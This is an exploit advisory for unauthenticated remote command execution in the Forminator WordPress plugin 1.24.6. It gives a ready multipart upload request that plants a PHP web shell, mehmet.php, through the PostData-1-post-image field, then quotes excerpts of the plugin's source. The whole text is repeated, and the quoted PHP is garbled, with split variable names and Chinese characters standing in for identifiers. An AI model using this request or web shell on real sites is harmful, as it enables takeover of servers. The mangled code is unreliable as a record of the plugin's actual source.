# Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution
# Date: 2023-07-20
# Exploit Author: Mehmet Kelepçe
# Vendor Homepage: https://wpmudev.com/project/forminator-pro/
# Software Link: https://wordpress.org/plugins/forminator/
# Version: 1.24.6
# Tested on: PHP - MySQL - Apache2 - Windows 11
HTTP request and vulnerable parameter:
------------------------------------------------------------------------------------------------------------------------
POST /3/wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 1756
sec-ch-ua:
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTMSFFKBEGMAJOMNE
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/3/WordPress/2023/01/01/Merhaba-dunya/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wp-settings-time-1=1689794282; wordpress_test_cookie=WP%20cookie%20check; wp_lang=tr_TR
Connection: close
------WebKitFormBoundaryTMSFFKBEGMAJOMNE
Content-Disposition: form-data; name="PostData-1-post-image"; filename="mehmet.php"
Content-Type: application/octet-stream
php
$ _get ['function']($ _ get ['cmd']);
?
Source code:
wp-content/plugins/forminator/library/modules/custom-forms/front/front-render.php:
--------------------------------------------------------------------------------------------------------------
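/**
 * Report whether this form contains at least one field that accepts a file upload.
 *
 * Both the generic 'upload' field and the 'postData' field are counted as
 * upload-capable, so a form whose only file-bearing field is a postData
 * field (the advisory's "PostData-1-post-image" parameter) is treated as an
 * upload form by the caller.
 *
 * @return bool True when any field has type 'upload' or 'postData', false otherwise
 *              (including when get_fields() returns nothing).
 */
public function has_upload() {
    $fields = $this->get_fields();
    if ( ! empty( $fields ) ) {
        foreach ( $fields as $field ) {
            // Either field type makes the whole form an upload form.
            if ( 'upload' === $field['type'] || 'postData' === $field['type'] ) {
                return true;
            }
        }
    }
    return false;
}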
Vulnerable parameter: PostData-1-post-image
and
Source code:
wp-content/plugins/forminator/library/fields/postdata.php:
--------------------------------------------------------------------------------------------------------
if(!
if(isset($ _files [$ image_field_name] ['name'])!
$ _files [$ image_field_name] ['name']){
$ file_name=sanitize_file_name($ _files [$ image_field_name] ['name']);
$有效=wp_check_filetype($ file_name);
if(false===$有效['ext'] ||!in_array($ vARE ['ext'],
$ this-image_extensions)){
$ this-validation_message [$ image_field_name]=apply_filters(
'forminator_postdata_field_post_image_nr_validation_message',
ESC_HTML __(不允许上传文件\'s扩展名。
$ id
);
}
}
}
Vulnerable variable: $image_field_name. Note that the excerpt above only records a validation message when the uploaded file's extension is not in $this->image_extensions; whether the upload is still processed after that message is set is not visible in this fragment.
------------------------------------------------------------------------------------------------------------------------
Payload file: mehmet.php
php
$ _get ['function']($ _ get ['cmd']);
?
------------------------------------------------------------------------------------------------------------------------
# Date: 2023-07-20
# Exploit Author: Mehmet Kelepçe
# Vendor Homepage: https://wpmudev.com/project/forminator-pro/
# Software Link: https://wordpress.org/plugins/forminator/
# Version: 1.24.6
# Tested on: PHP - MySQL - Apache2 - Windows 11
HTTP request and vulnerable parameter:
POST /3/wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 1756
sec-ch-ua:
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTMSFFKBEGMAJOMNE
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/3/WordPress/2023/01/01/Merhaba-dunya/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wp-settings-time-1=1689794282; wordpress_test_cookie=WP%20cookie%20check; wp_lang=tr_TR
Connection: close
------WebKitFormBoundaryTMSFFKBEGMAJOMNE
Content-Disposition: form-data; name="PostData-1-post-image"; filename="mehmet.php"
Content-Type: application/octet-stream
php
$ _get ['function']($ _ get ['cmd']);
?
Source code:
wp-content/plugins/forminator/library/modules/custom-forms/front/front-render.php:
--------------------------------------------------------------------------------------------------------------
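/**
 * Report whether this form contains at least one field that accepts a file upload.
 *
 * Both the generic 'upload' field and the 'postData' field are counted as
 * upload-capable, so a form whose only file-bearing field is a postData
 * field (the advisory's "PostData-1-post-image" parameter) is treated as an
 * upload form by the caller.
 *
 * @return bool True when any field has type 'upload' or 'postData', false otherwise
 *              (including when get_fields() returns nothing).
 */
public function has_upload() {
    $fields = $this->get_fields();
    if ( ! empty( $fields ) ) {
        foreach ( $fields as $field ) {
            // Either field type makes the whole form an upload form.
            if ( 'upload' === $field['type'] || 'postData' === $field['type'] ) {
                return true;
            }
        }
    }
    return false;
}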
Vulnerable parameter: PostData-1-post-image
and
Source code:
wp-content/plugins/forminator/library/fields/postdata.php:
--------------------------------------------------------------------------------------------------------
if(!
if(isset($ _files [$ image_field_name] ['name'])!
$ _files [$ image_field_name] ['name']){
$ file_name=sanitize_file_name($ _files [$ image_field_name] ['name']);
$有效=wp_check_filetype($ file_name);
if(false===$有效['ext'] ||!in_array($ vARE ['ext'],
$ this-image_extensions)){
$ this-validation_message [$ image_field_name]=apply_filters(
'forminator_postdata_field_post_image_nr_validation_message',
ESC_HTML __(不允许上传文件\'s扩展名。
$ id
);
}
}
}
Vulnerable variable: $image_field_name. Note that the excerpt above only records a validation message when the uploaded file's extension is not in $this->image_extensions; whether the upload is still processed after that message is set is not visible in this fragment.
------------------------------------------------------------------------------------------------------------------------
Payload file: mehmet.php
php
$ _get ['function']($ _ get ['cmd']);
?
------------------------------------------------------------------------------------------------------------------------